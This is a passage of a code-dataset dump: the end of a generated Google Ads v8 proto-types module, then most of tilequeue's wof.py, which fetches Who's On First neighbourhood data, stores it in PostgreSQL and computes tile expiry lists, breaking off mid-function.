selected from this list. Call-to-actions are
optional and at most 5 can be specified.
marketing_images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
List of marketing image assets that may be
displayed with the ad. The images must be
314x600 pixels or 320x320 pixels. At least 1 and
at most 20 image assets must be specified.
logo_images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
List of logo image assets that may be
displayed with the ad. The images must be
128x128 pixels and not larger than 120KB. At
least 1 and at most 5 image assets must be
specified.
videos (Sequence[google.ads.googleads.v8.common.types.AdVideoAsset]):
List of YouTube video assets that may be
displayed with the ad. Videos are optional and
at most 20 can be specified.
path1 (str):
First part of optional text that may appear
appended to the url displayed in the ad.
path2 (str):
Second part of optional text that may appear
appended to the url displayed in the ad. This
field can only be set when path1 is also set.
"""
headlines = proto.RepeatedField(
proto.MESSAGE,
number=1,
message=ad_asset.AdTextAsset,
)
descriptions = proto.RepeatedField(
proto.MESSAGE,
number=2,
message=ad_asset.AdTextAsset,
)
call_to_actions = proto.RepeatedField(
proto.MESSAGE,
number=3,
message=ad_asset.AdTextAsset,
)
marketing_images = proto.RepeatedField(
proto.MESSAGE,
number=4,
message=ad_asset.AdImageAsset,
)
logo_images = proto.RepeatedField(
proto.MESSAGE,
number=5,
message=ad_asset.AdImageAsset,
)
videos = proto.RepeatedField(
proto.MESSAGE,
number=6,
message=ad_asset.AdVideoAsset,
)
path1 = proto.Field(
proto.STRING,
number=9,
optional=True,
)
path2 = proto.Field(
proto.STRING,
number=10,
optional=True,
)
class DisplayUploadAdInfo(proto.Message):
r"""A generic type of display ad. The exact ad format is controlled by
the display_upload_product_type field, which determines what kinds
of data need to be included with the ad.
Attributes:
display_upload_product_type (google.ads.googleads.v8.enums.types.DisplayUploadProductTypeEnum.DisplayUploadProductType):
The product type of this ad. See comments on
the enum for details.
media_bundle (google.ads.googleads.v8.common.types.AdMediaBundleAsset):
A media bundle asset to be used in the ad. For information
about the media bundle for HTML5_UPLOAD_AD see
https://support.google.com/google-ads/answer/1722096 Media
bundles that are part of dynamic product types use a special
format that needs to be created through the Google Web
Designer. See
https://support.google.com/webdesigner/answer/7543898 for
more information.
"""
display_upload_product_type = proto.Field(
proto.ENUM,
number=1,
enum=gage_display_upload_product_type.DisplayUploadProductTypeEnum.DisplayUploadProductType,
)
media_bundle = proto.Field(
proto.MESSAGE,
number=2,
oneof='media_asset',
message=ad_asset.AdMediaBundleAsset,
)
class ResponsiveDisplayAdControlSpec(proto.Message):
r"""Specification for various creative controls for a responsive
display ad.
Attributes:
enable_asset_enhancements (bool):
Whether the advertiser has opted into the
asset enhancements feature.
enable_autogen_video (bool):
Whether the advertiser has opted into auto-
en video feature.
"""
enable_asset_enhancements = proto.Field(
proto.BOOL,
number=1,
)
enable_autogen_video = proto.Field(
proto.BOOL,
number=2,
)
class SmartCampaignAdInfo(proto.Message):
r"""A Smart campaign ad.
Attributes:
headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for headlines. When the
ad serves the headlines will be selected from
this list. 3 headlines must be specified.
descriptions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for descriptions. When
the ad serves the descriptions will be selected
from this list. 2 descriptions must be
specified.
"""
headlines = proto.RepeatedField(
proto.MESSAGE,
number=1,
message=ad_asset.AdTextAsset,
)
descriptions = proto.RepeatedField(
proto.MESSAGE,
number=2,
message=ad_asset.AdTextAsset,
)
class CallAdInfo(proto.Message):
r"""A call ad.
Attributes:
country_code (str):
The country code in the ad.
phone_number (str):
The phone number in the ad.
business_name (str):
The business name in the ad.
headline1 (str):
First headline in the ad.
headline2 (str):
Second headline in the ad.
description1 (str):
The first line of the ad's description.
description2 (str):
The second line of the ad's description.
call_tracked (bool):
Whether to enable call tracking for the
creative. Enabling call tracking also enables
call conversions.
disable_call_conversion (bool):
Whether to disable call conversion for the creative. If set
to ``true``, disables call conversions even when
``call_tracked`` is ``true``. If ``call_tracked`` is
``false``, this field is ignored.
phone_number_verification_url (str):
The URL to be used for phone number
verification.
conversion_action (str):
The conversion action to attribute a call conversion to. If
not set a default conversion action is used. This field only
has effect if call_tracked is set to true. Otherwise this
field is ignored.
conversion_reporting_state (google.ads.googleads.v8.enums.types.CallConversionReportingStateEnum.CallConversionReportingState):
The call conversion behavior of this call ad.
It can use its own call conversion setting,
inherit the account level setting, or be
disabled.
path1 (str):
First part of text that may appear appended
to the url displayed to in the ad. Optional.
path2 (str):
Second part of text that may appear appended
to the url displayed to in the ad. This field
can only be set when path1 is set. Optional.
"""
country_code = proto.Field(
proto.STRING,
number=1,
)
phone_number = proto.Field(
proto.STRING,
number=2,
)
business_name = proto.Field(
proto.STRING,
number=3,
)
headline1 = proto.Field(
proto.STRING,
number=11,
)
headline2 = proto.Field(
proto.STRING,
number=12,
)
description1 = proto.Field(
proto.STRING,
number=4,
)
description2 = proto.Field(
proto.STRING,
number=5,
)
call_tracked = proto.Field(
proto.BOOL,
number=6,
)
disable_call_conversion = proto.Field(
proto.BOOL,
number=7,
)
phone_number_verification_url = proto.Field(
proto.STRING,
number=8,
)
conversion_action = proto.Field(
proto.STRING,
number=9,
)
conversion_reporting_state = proto.Field(
proto.ENUM,
number=10,
enum=call_conversion_reporting_state.CallConversionReportingStateEnum.CallConversionReportingState,
)
path1 = proto.Field(
proto.STRING,
number=13,
)
path2 = proto.Field(
proto.STRING,
number=14,
)
__all__ = tuple(sorted(__protobuf__.manifest))
|
apache-2.0
| 1,371,305,617,412,775,000
| 30.178258
| 135
| 0.60667
| false
| 4.161035
| false
| false
| false
|
mapzen/tilequeue
|
tilequeue/wof.py
|
1
|
46004
|
from __future__ import absolute_import
from collections import namedtuple
from contextlib import closing
from cStringIO import StringIO
from datetime import datetime
from edtf import parse_edtf
from operator import attrgetter
from psycopg2.extras import register_hstore
from shapely import geos
from tilequeue.tile import coord_marshall_int
from tilequeue.tile import coord_unmarshall_int
from tilequeue.tile import mercator_point_to_coord
from tilequeue.tile import reproject_lnglat_to_mercator
import csv
import json
import os.path
import psycopg2
import Queue
import requests
import shapely.geometry
import shapely.ops
import shapely.wkb
import threading
DATABASE_SRID = 3857
def generate_csv_lines(requests_result):
for line in requests_result.iter_lines():
if line:
yield line
neighbourhood_placetypes_to_int = dict(
neighbourhood=1,
microhood=2,
macrohood=3,
borough=4,
)
neighbourhood_int_to_placetypes = {
1: 'neighbourhood',
2: 'microhood',
3: 'macrohood',
4: 'borough',
}
NeighbourhoodMeta = namedtuple(
'NeighbourhoodMeta',
'wof_id placetype name hash label_position')
Neighbourhood = namedtuple(
'Neighbourhood',
'wof_id placetype name hash label_position geometry n_photos area '
'min_zoom max_zoom is_landuse_aoi inception cessation l10n_names')
def parse_neighbourhood_meta_csv(csv_line_generator, placetype):
reader = csv.reader(csv_line_generator)
it = iter(reader)
header = it.next()
lbl_lat_idx = header.index('lbl_latitude')
lbl_lng_idx = header.index('lbl_longitude')
name_idx = header.index('name')
wof_id_idx = header.index('id')
hash_idx = header.index('file_hash')
superseded_by_idx = header.index('superseded_by')
min_row_length = (max(
lbl_lat_idx, lbl_lng_idx, name_idx, wof_id_idx, hash_idx,
superseded_by_idx) + 1)
for row in it:
if len(row) < min_row_length:
continue
superseded_by = row[superseded_by_idx]
if superseded_by:
continue
wof_id_str = row[wof_id_idx]
if not wof_id_str:
continue
try:
wof_id = int(wof_id_str)
except ValueError:
continue
name = row[name_idx]
if not name:
continue
lat_str = row[lbl_lat_idx]
lng_str = row[lbl_lng_idx]
try:
lat = float(lat_str)
lng = float(lng_str)
except ValueError:
continue
file_hash = row[hash_idx]
label_x, label_y = reproject_lnglat_to_mercator(lng, lat)
label_position = shapely.geometry.Point(label_x, label_y)
neighbourhood_meta = NeighbourhoodMeta(
wof_id, placetype, name, file_hash, label_position)
yield neighbourhood_meta
def _make_requests_session_with_retries(max_retries):
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util import Retry
s = requests.Session()
a = HTTPAdapter(
max_retries=Retry(
total=max_retries,
status_forcelist=[ # this is a list of statuses to consider to be
# an error and retry.
429, # Too many requests (i.e: back off)
500, # Generic internal server error
502, # Bad Gateway - i.e: upstream failure
503, # Unavailable, temporarily
504, # Gateway timeout
522 # Origin connection timed out
],
backoff_factor=1.0 # back off for 0s, 1s, 3s, 7s, etc... after
# each successive failure. (factor*(2^N-1))
))
# use retry for both HTTP and HTTPS connections.
s.mount('http://', a)
s.mount('https://', a)
return s
def fetch_wof_url_meta_neighbourhoods(url, placetype, max_retries):
s = _make_requests_session_with_retries(max_retries)
r = s.get(url, stream=True)
assert r.status_code == 200, 'Failure requesting: %s' % url
csv_line_generator = generate_csv_lines(r)
return parse_neighbourhood_meta_csv(csv_line_generator, placetype)
class NeighbourhoodFailure(object):
def __init__(self, wof_id, reason, message, halt=False, skipped=False,
funky=False, superseded=False):
# halt is a signal that threads should stop fetching. This
# would happen during a network IO error or when we get an
# unexpected http response when fetching raw json files. In
# some scenarios this could be recoverable, but because that
# isn't always the case we assume that we should stop further
# requests for more raw json files, and just process what we
# have so far.
# skipped means that we won't log this failure, ie there was
# an earlier "halt" error and processing of further records
# has stopped.
# funky is a signal downstream that this is a "soft" or
# expected failure, in the sense that it only means that we
# should skip the record, but we didn't actually detect any
# errors with the processing
# superseded is set when the json has a value for
# wof:superseded. This would indicate a data inconsistency
# because the meta csv file didn't have it set if we're trying
# to fetch the raw json in the first place. But this is meant
# to catch this scenario.
self.wof_id = wof_id
self.reason = reason
self.message = message
self.halt = halt
self.skipped = skipped
self.funky = funky
self.superseded = superseded
# given a string, parse it as EDTF while allowing a single 'u' or None to mean
# completely unknown, and return the EDTF object.
def _normalize_edtf(s):
if s and s != 'u':
try:
return parse_edtf(s)
except Exception:
pass
# when all else fails, return the "most unknown" EDTF.
return parse_edtf('uuuu')
def create_neighbourhood_from_json(json_data, neighbourhood_meta):
def failure(reason):
return NeighbourhoodFailure(
neighbourhood_meta.wof_id, reason, json.dumps(json_data))
if not isinstance(json_data, dict):
return failure('Unexpected json')
props = json_data.get('properties')
if props is None or not isinstance(props, dict):
return failure('Missing properties')
superseded_by = props.get('wof:superseded_by')
# these often show up as empty lists, so we do a truthy test
# instead of expicitly checking for None
if superseded_by:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'superseded_by: %s' % superseded_by,
json.dumps(json_data), superseded=True)
geometry = json_data.get('geometry')
if geometry is None:
return failure('Missing geometry')
try:
shape_lnglat = shapely.geometry.shape(geometry)
except Exception:
return failure('Unexpected geometry')
shape_mercator = shapely.ops.transform(
reproject_lnglat_to_mercator, shape_lnglat)
# ignore any features that are marked as funky
is_funky = props.get('mz:is_funky')
if is_funky is not None:
try:
is_funky = int(is_funky)
except ValueError:
return failure('Unexpected mz:is_funky value %s' % is_funky)
if is_funky != 0:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'mz:is_funky value is not 0: %s' % is_funky,
json.dumps(json_data), funky=True)
wof_id = props.get('wof:id')
if wof_id is None:
return failure('Missing wof:id')
try:
wof_id = int(wof_id)
except ValueError:
return failure('wof_id is not an int: %s' % wof_id)
name = props.get('wof:name')
if name is None:
return failure('Missing name')
n_photos = props.get('misc:photo_sum')
if n_photos is not None:
try:
n_photos = int(n_photos)
except ValueError:
return failure('misc:photo_sum is not an int: %s' % n_photos)
label_lat = props.get('lbl:latitude')
label_lng = props.get('lbl:longitude')
if label_lat is None or label_lng is None:
# first, try to fall back to geom:* when lbl:* is missing. we'd prefer
# to have lbl:*, but it's better to have _something_ than nothing.
label_lat = props.get('geom:latitude')
label_lng = props.get('geom:longitude')
if label_lat is None or label_lng is None:
return failure('Missing lbl:latitude or lbl:longitude and ' +
'geom:latitude or geom:longitude')
try:
label_lat = float(label_lat)
label_lng = float(label_lng)
except ValueError:
return failure('lbl:latitude or lbl:longitude not float')
label_merc_x, label_merc_y = reproject_lnglat_to_mercator(
label_lng, label_lat)
label_position = shapely.geometry.Point(label_merc_x, label_merc_y)
placetype = props.get('wof:placetype')
if placetype is None:
return failure('Missing wof:placetype')
default_min_zoom = 15
default_max_zoom = 16
min_zoom = props.get('mz:min_zoom')
if min_zoom is None:
min_zoom = default_min_zoom
else:
try:
min_zoom = float(min_zoom)
except ValueError:
return failure('mz:min_zoom not float: %s' % min_zoom)
max_zoom = props.get('mz:max_zoom')
if max_zoom is None:
max_zoom = default_max_zoom
else:
try:
max_zoom = float(max_zoom)
except ValueError:
return failure('mz:max_zoom not float: %s' % max_zoom)
is_landuse_aoi = props.get('mz:is_landuse_aoi')
if is_landuse_aoi is not None:
try:
is_landuse_aoi = int(is_landuse_aoi)
except ValueError:
return failure('is_landuse_aoi not int: %s' % is_landuse_aoi)
is_landuse_aoi = is_landuse_aoi != 0
if shape_mercator.type in ('Polygon', 'MultiPolygon'):
area = int(shape_mercator.area)
else:
area = None
# for the purposes of display, we only care about the times when something
# should first start to be shown, and the time when it should stop
# showing.
edtf_inception = _normalize_edtf(props.get('edtf:inception'))
edtf_cessation = _normalize_edtf(props.get('edtf:cessation'))
edtf_deprecated = _normalize_edtf(props.get('edtf:deprecated'))
# check that the dates are valid first to return back a better error
inception_earliest = edtf_inception.lower_fuzzy()
cessation_latest = edtf_cessation.upper_fuzzy()
deprecated_latest = edtf_deprecated.upper_fuzzy()
if inception_earliest is None:
return failure('invalid edtf:inception: %s' %
props.get('edtf:inception'))
if cessation_latest is None:
return failure('invalid edtf:cessation: %s' %
props.get('edtf:cessation'))
if deprecated_latest is None:
return failure('invalid edtf:deprecated: %s' %
props.get('edtf:deprecated'))
# the 'edtf:inception' property gives us approximately the former and we
# take the earliest date it could mean. the 'edtf:cessation' and
# 'edtf:deprecated' would both stop the item showing, so we take the
# earliest of each's latest possible date.
inception = inception_earliest
cessation = min(cessation_latest, deprecated_latest)
# grab any names in other languages
lang_suffix_size = len('_preferred')
l10n_names = {}
for k, v in props.iteritems():
if not v:
continue
if not k.startswith('name:') or not k.endswith('_preferred'):
continue
if isinstance(v, list):
v = v[0]
lang = k[:-lang_suffix_size]
l10n_names[lang] = v
if not l10n_names:
l10n_names = None
neighbourhood = Neighbourhood(
wof_id, placetype, name, neighbourhood_meta.hash, label_position,
shape_mercator, n_photos, area, min_zoom, max_zoom, is_landuse_aoi,
inception, cessation, l10n_names)
return neighbourhood
def fetch_url_raw_neighbourhood(url, neighbourhood_meta, max_retries):
try:
s = _make_requests_session_with_retries(max_retries)
r = s.get(url)
except Exception, e:
# if there is an IO error when fetching the url itself, we'll
# want to halt too
return NeighbourhoodFailure(
neighbourhood_meta.wof_id, 'IO Error fetching %s' % url, str(e),
halt=True)
if r.status_code != 200:
# once we don't get a 200, signal that we should stop all
# remaining processing
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'Invalid response %d for %s' % (r.status_code, url), r.text,
halt=True)
try:
doc = r.json()
except Exception, e:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id, 'Response is not json for %s' % url,
r.text)
try:
neighbourhood = create_neighbourhood_from_json(doc, neighbourhood_meta)
except Exception, e:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'Unexpected exception parsing json',
json.dumps(doc))
return neighbourhood
def fetch_fs_raw_neighbourhood(path, neighbourhood_meta):
with open(path) as fp:
json_data = json.load(fp)
neighbourhood = create_neighbourhood_from_json(json_data,
neighbourhood_meta)
return neighbourhood
def generate_wof_url(url_prefix, wof_id):
wof_id_str = str(wof_id)
grouped = []
grouping = []
for c in wof_id_str:
grouping.append(c)
if len(grouping) == 3:
grouped.append(grouping)
grouping = []
if grouping:
grouped.append(grouping)
grouped_part = '/'.join([''.join(part) for part in grouped])
wof_url = '%s/%s/%s.geojson' % (url_prefix, grouped_part, wof_id_str)
return wof_url
def make_fetch_raw_url_fn(data_url_prefix, max_retries):
def fn(neighbourhood_meta):
wof_url = generate_wof_url(
data_url_prefix, neighbourhood_meta.wof_id)
neighbourhood = fetch_url_raw_neighbourhood(wof_url,
neighbourhood_meta,
max_retries)
return neighbourhood
return fn
def make_fetch_raw_filesystem_fn(data_path):
def fn(neighbourhood_meta):
# this will work for OS's with / separators
wof_path = generate_wof_url(
data_path, neighbourhood_meta.wof_id)
neighbourhood = fetch_fs_raw_neighbourhood(wof_path,
neighbourhood_meta)
return neighbourhood
return fn
def threaded_fetch(neighbourhood_metas, n_threads, fetch_raw_fn):
queue_size = n_threads * 10
neighbourhood_input_queue = Queue.Queue(queue_size)
neighbourhood_output_queue = Queue.Queue(len(neighbourhood_metas))
stop = threading.Event()
def _fetch_raw_neighbourhood():
while True:
neighbourhood_meta = neighbourhood_input_queue.get()
if neighbourhood_meta is None:
break
if stop.is_set():
# assume all remaining neighbourhoods are failures
# these will get skipped
neighbourhood_output_queue.put(NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'Skipping remaining neighbourhoods',
'Skipping remaining neighbourhoods',
skipped=True))
continue
neighbourhood = fetch_raw_fn(neighbourhood_meta)
if isinstance(neighbourhood, NeighbourhoodFailure):
failure = neighbourhood
# if this is the type of error that should stop all
# processing, notify all other threads
if failure.halt:
stop.set()
neighbourhood_output_queue.put(neighbourhood)
fetch_threads = []
for i in xrange(n_threads):
fetch_thread = threading.Thread(target=_fetch_raw_neighbourhood)
fetch_thread.start()
fetch_threads.append(fetch_thread)
for neighbourhood_meta in neighbourhood_metas:
neighbourhood_input_queue.put(neighbourhood_meta)
for fetch_thread in fetch_threads:
neighbourhood_input_queue.put(None)
neighbourhoods = []
failures = []
for i in xrange(len(neighbourhood_metas)):
neighbourhood = neighbourhood_output_queue.get()
if isinstance(neighbourhood, NeighbourhoodFailure):
failures.append(neighbourhood)
else:
neighbourhoods.append(neighbourhood)
for fetch_thread in fetch_threads:
fetch_thread.join()
return neighbourhoods, failures
class WofUrlNeighbourhoodFetcher(object):
def __init__(self, neighbourhood_url, microhood_url, macrohood_url,
borough_url, data_url_prefix, n_threads, max_retries):
self.neighbourhood_url = neighbourhood_url
self.microhood_url = microhood_url
self.macrohood_url = macrohood_url
self.borough_url = borough_url
self.data_url_prefix = data_url_prefix
self.n_threads = n_threads
self.max_retries = max_retries
def fetch_meta_neighbourhoods(self):
return fetch_wof_url_meta_neighbourhoods(
self.neighbourhood_url, 'neighbourhood', self.max_retries)
def fetch_meta_microhoods(self):
return fetch_wof_url_meta_neighbourhoods(
self.microhood_url, 'microhood', self.max_retries)
def fetch_meta_macrohoods(self):
return fetch_wof_url_meta_neighbourhoods(
self.macrohood_url, 'macrohood', self.max_retries)
def fetch_meta_boroughs(self):
return fetch_wof_url_meta_neighbourhoods(
self.borough_url, 'borough', self.max_retries)
def fetch_raw_neighbourhoods(self, neighbourhood_metas):
url_fetch_fn = make_fetch_raw_url_fn(self.data_url_prefix,
self.max_retries)
neighbourhoods, failures = threaded_fetch(
neighbourhood_metas, self.n_threads, url_fetch_fn)
return neighbourhoods, failures
class WofFilesystemNeighbourhoodFetcher(object):
def __init__(self, wof_data_path, n_threads):
self.wof_data_path = wof_data_path
self.n_threads = n_threads
def _fetch_meta_neighbourhoods(self, placetype):
meta_fs_path = os.path.join(
self.wof_data_path, 'meta', 'wof-%s-latest.csv' % placetype)
with open(meta_fs_path) as fp:
meta_neighbourhoods = list(
parse_neighbourhood_meta_csv(fp, placetype))
return meta_neighbourhoods
def fetch_meta_neighbourhoods(self):
return self._fetch_meta_neighbourhoods('neighbourhood')
def fetch_meta_microhoods(self):
return self._fetch_meta_neighbourhoods('microhood')
def fetch_meta_macrohoods(self):
return self._fetch_meta_neighbourhoods('macrohood')
def fetch_meta_boroughs(self):
return self._fetch_meta_neighbourhoods('borough')
def fetch_raw_neighbourhoods(self, neighbourhood_metas):
data_prefix = os.path.join(
self.wof_data_path, 'data')
fs_fetch_fn = make_fetch_raw_filesystem_fn(data_prefix)
neighbourhoods, failures = threaded_fetch(
neighbourhood_metas, self.n_threads, fs_fetch_fn)
return neighbourhoods, failures
def create_neighbourhood_file_object(neighbourhoods, curdate=None):
if curdate is None:
curdate = datetime.now().date()
# tell shapely to include the srid when generating WKBs
geos.WKBWriter.defaults['include_srid'] = True
buf = StringIO()
def escape_string(s):
return s.encode('utf-8').replace('\t', ' ').replace('\n', ' ')
def escape_hstore_string(s):
s = escape_string(s)
if ' ' in s:
s = s.replace('"', '\\\\"')
s = '"%s"' % s
return s
def write_nullable_int(buf, x):
if x is None:
buf.write('\\N\t')
else:
buf.write('%d\t' % x)
for n in neighbourhoods:
buf.write('%d\t' % n.wof_id)
buf.write('%d\t' % neighbourhood_placetypes_to_int[n.placetype])
buf.write('%s\t' % escape_string(n.name))
buf.write('%s\t' % escape_string(n.hash))
write_nullable_int(buf, n.n_photos)
write_nullable_int(buf, n.area)
buf.write('%d\t' % n.min_zoom)
buf.write('%d\t' % n.max_zoom)
if n.is_landuse_aoi is None:
buf.write('\\N\t')
else:
buf.write('%s\t' % ('true' if n.is_landuse_aoi else 'false'))
geos.lgeos.GEOSSetSRID(n.label_position._geom, DATABASE_SRID)
buf.write(n.label_position.wkb_hex)
buf.write('\t')
geos.lgeos.GEOSSetSRID(n.geometry._geom, DATABASE_SRID)
buf.write(n.geometry.wkb_hex)
buf.write('\t')
buf.write('%s\t' % n.inception.isoformat())
buf.write('%s\t' % n.cessation.isoformat())
is_visible = n.inception < curdate and n.cessation >= curdate
is_visible_str = 't' if is_visible else 'f'
buf.write('%s\t' % is_visible_str)
if n.l10n_names:
hstore_items = []
for k, v in n.l10n_names.items():
k = escape_hstore_string(k)
v = escape_hstore_string(v)
hstore_items.append("%s=>%s" % (k, v))
hstore_items_str = ','.join(hstore_items)
buf.write('%s' % hstore_items_str)
else:
buf.write('\\N')
buf.write('\n')
buf.seek(0)
return buf
class WofModel(object):
def __init__(self, postgresql_conn_info):
self.postgresql_conn_info = postgresql_conn_info
self.table = 'wof_neighbourhood'
def _create_conn(self):
conn = psycopg2.connect(**self.postgresql_conn_info)
register_hstore(conn)
conn.set_session(autocommit=False)
return conn
def find_previous_neighbourhood_meta(self):
with closing(self._create_conn()) as conn:
with conn.cursor() as cursor:
cursor.execute(
'SELECT wof_id, placetype, name, hash, '
'ST_AsBinary(label_position) '
'FROM %s ORDER BY wof_id ASC' % self.table)
ns = []
for row in cursor:
wof_id, placetype_int, name, hash, label_bytes = row
wof_id = int(wof_id)
label_bytes = bytes(label_bytes)
label_position = shapely.wkb.loads(label_bytes)
placetype = neighbourhood_int_to_placetypes[placetype_int]
n = NeighbourhoodMeta(
wof_id, placetype, name, hash, label_position)
ns.append(n)
return ns
def sync_neighbourhoods(
self, neighbourhoods_to_add, neighbourhoods_to_update,
ids_to_remove):
geos.WKBWriter.defaults['include_srid'] = True
def gen_data(n):
geos.lgeos.GEOSSetSRID(n.label_position._geom, DATABASE_SRID)
geos.lgeos.GEOSSetSRID(n.geometry._geom, DATABASE_SRID)
return dict(
table=self.table,
placetype=neighbourhood_placetypes_to_int[n.placetype],
name=n.name,
hash=n.hash,
n_photos=n.n_photos,
area=n.area,
min_zoom=n.min_zoom,
max_zoom=n.max_zoom,
is_landuse_aoi=n.is_landuse_aoi,
inception=n.inception,
cessation=n.cessation,
label_position=n.label_position.wkb_hex,
geometry=n.geometry.wkb_hex,
wof_id=n.wof_id,
l10n_name=n.l10n_names,
)
if ids_to_remove:
ids_to_remove_str = ', '.join(map(str, ids_to_remove))
if neighbourhoods_to_update:
update_data = map(gen_data, neighbourhoods_to_update)
if neighbourhoods_to_add:
insert_data = map(gen_data, neighbourhoods_to_add)
# this closes the connection
with closing(self._create_conn()) as conn:
# this commits the transaction
with conn as conn:
# this frees any resources associated with the cursor
with conn.cursor() as cursor:
if ids_to_remove:
cursor.execute(
'DELETE FROM %s WHERE wof_id IN (%s)' %
(self.table, ids_to_remove_str))
if neighbourhoods_to_update:
cursor.executemany(
'UPDATE ' + self.table + ' SET '
'placetype=%(placetype)s, '
'name=%(name)s, '
'hash=%(hash)s, '
'n_photos=%(n_photos)s, '
'area=%(area)s, '
'min_zoom=%(min_zoom)s, '
'max_zoom=%(max_zoom)s, '
'is_landuse_aoi=%(is_landuse_aoi)s, '
'inception=%(inception)s, '
'cessation=%(cessation)s, '
'label_position=%(label_position)s, '
'l10n_name=%(l10n_name)s, '
'geometry=%(geometry)s '
'WHERE wof_id=%(wof_id)s',
update_data)
if neighbourhoods_to_add:
cursor.executemany(
'INSERT INTO ' + self.table + ' '
'(wof_id, placetype, name, hash, n_photos, area, '
'min_zoom, max_zoom, is_landuse_aoi, '
'inception, cessation, '
'label_position, geometry, l10n_name) '
'VALUES (%(wof_id)s, %(placetype)s, %(name)s, '
'%(hash)s, %(n_photos)s, %(area)s, %(min_zoom)s, '
'%(max_zoom)s, %(is_landuse_aoi)s, '
'%(inception)s, %(cessation)s, '
'%(label_position)s, %(geometry)s, %(l10n_name)s)',
insert_data)
def insert_neighbourhoods(self, neighbourhoods):
# create this whole input file like object outside of the transaction
nf = create_neighbourhood_file_object(neighbourhoods)
# close the connection
with closing(self._create_conn()) as conn:
# commit the transaction
with conn as conn:
with conn.cursor() as cursor:
cursor.copy_from(nf, self.table)
# update the whole table so that the `is_visible` flag is accurate for the
# `current_date`. this returns a list of coords at `zoom` which have
# changed visibility from true to false or vice-versa.
def update_visible_timestamp(self, zoom, current_date):
coords = set()
def coord_int(row):
x, y = row
return coord_int_at_mercator_point(zoom, x, y)
# close the connection
with closing(self._create_conn()) as conn:
# commit the transaction
with conn as conn:
with conn.cursor() as cursor:
# select the x, y position of the label for each WOF
# neighbourhood that changed visibility when the date
# was updated to `current_date`.
cursor.execute(
'SELECT st_x(n.label_position) as x, '
' st_y(n.label_position) as y '
'FROM ('
' SELECT wof_update_visible_ids(%s::date) AS id '
') u '
'JOIN wof_neighbourhood n '
'ON n.wof_id = u.id',
(current_date.isoformat(),))
for result in cursor:
coords.add(coord_int(result))
return coords
def diff_neighbourhoods(xs, ys):
# NOTE this requires that both xs and ys be sequences of
# neighbourhoods, sorted by wof_id in ascending order
# returns a sequence of tuples:
# (None, x) -> neighbourhoods that have been added
# (x, None) -> neighbourhoods that have been removed
# (x, y) -> neighbourhoods that have been updated
diffs = []
n_xs = len(xs)
n_ys = len(ys)
idx_xs = 0
idx_ys = 0
# iterate through both lists while we still have values for both
while idx_xs < n_xs and idx_ys < n_ys:
x = xs[idx_xs]
y = ys[idx_ys]
if x.wof_id < y.wof_id:
diffs.append((x, None))
idx_xs += 1
continue
if y.wof_id < x.wof_id:
diffs.append((None, y))
idx_ys += 1
continue
if x.hash != y.hash:
# if there are any differences the hash will be different
diffs.append((x, y))
idx_xs += 1
idx_ys += 1
# catch any differences
while idx_xs < n_xs:
x = xs[idx_xs]
diffs.append((x, None))
idx_xs += 1
while idx_ys < n_ys:
y = ys[idx_ys]
diffs.append((None, y))
idx_ys += 1
return diffs
def coord_int_at_mercator_point(z, x, y):
coord = mercator_point_to_coord(z, x, y)
coord_int = coord_marshall_int(coord)
return coord_int
def generate_tile_expiry_list(zoom, diffs):
coord_ints = set()
def add_neighbourhood_diff(n):
if n is not None:
x = n.label_position.x
y = n.label_position.y
coord_int = coord_int_at_mercator_point(zoom, x, y)
coord_ints.add(coord_int)
for n1, n2 in diffs:
# for our purposes, we will expire any kind of modification,
# whether the neighbourhoods were added, removed, or updated
add_neighbourhood_diff(n1)
add_neighbourhood_diff(n2)
return coord_ints
def log_failure(logger, failure):
if not (failure.skipped or failure.funky or failure.superseded):
failure_message_one_line = failure.message.replace('\n', ' | ')
logger.error('Neighbourhood failure for %d: %r - %r' % (
failure.wof_id, failure.reason, failure_message_one_line))
class WofProcessor(object):
def __init__(self, fetcher, model, redis_cache_index, intersector,
rawr_enqueuer, logger, current_date):
self.fetcher = fetcher
self.model = model
self.redis_cache_index = redis_cache_index
self.intersector = intersector
self.rawr_enqueuer = rawr_enqueuer
self.logger = logger
self.zoom_expiry = 16
self.zoom_until = 11
self.current_date = current_date
def __call__(self):
# perform IO to get old/new neighbourhoods and tiles of
# interest in parallel
# queues to pass the results through the threads
prev_neighbourhoods_queue = Queue.Queue(1)
meta_neighbourhoods_queue = Queue.Queue(1)
meta_microhoods_queue = Queue.Queue(1)
meta_macrohoods_queue = Queue.Queue(1)
meta_boroughs_queue = Queue.Queue(1)
toi_queue = Queue.Queue(1)
# functions for the threads
def find_prev_neighbourhoods():
prev_neighbourhoods = (
self.model.find_previous_neighbourhood_meta())
prev_neighbourhoods_queue.put(prev_neighbourhoods)
def make_fetch_meta_csv_fn(fn, queue):
neighbourhood_metas = list(fn())
queue.put(neighbourhood_metas)
def fetch_toi():
toi = self.redis_cache_index.fetch_tiles_of_interest()
toi_queue.put(toi)
self.logger.info('Fetching tiles of interest in background ...')
self.logger.info('Fetching old and new neighbourhoods ...')
# start the threads in parallel
prev_neighbourhoods_thread = threading.Thread(
target=find_prev_neighbourhoods)
prev_neighbourhoods_thread.start()
meta_neighbourhoods_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_neighbourhoods,
meta_neighbourhoods_queue))
meta_neighbourhoods_thread.start()
meta_microhoods_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_microhoods,
meta_microhoods_queue))
meta_microhoods_thread.start()
meta_macrohoods_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_macrohoods,
meta_macrohoods_queue))
meta_macrohoods_thread.start()
meta_boroughs_thread = threading.Thread(
target=make_fetch_meta_csv_fn(
self.fetcher.fetch_meta_boroughs,
meta_boroughs_queue))
meta_boroughs_thread.start()
toi_thread = threading.Thread(target=fetch_toi)
toi_thread.start()
# ensure we're done with finding the next and previous
# neighbourhoods by this point
prev_neighbourhoods_thread.join()
meta_neighbourhoods_thread.join()
meta_microhoods_thread.join()
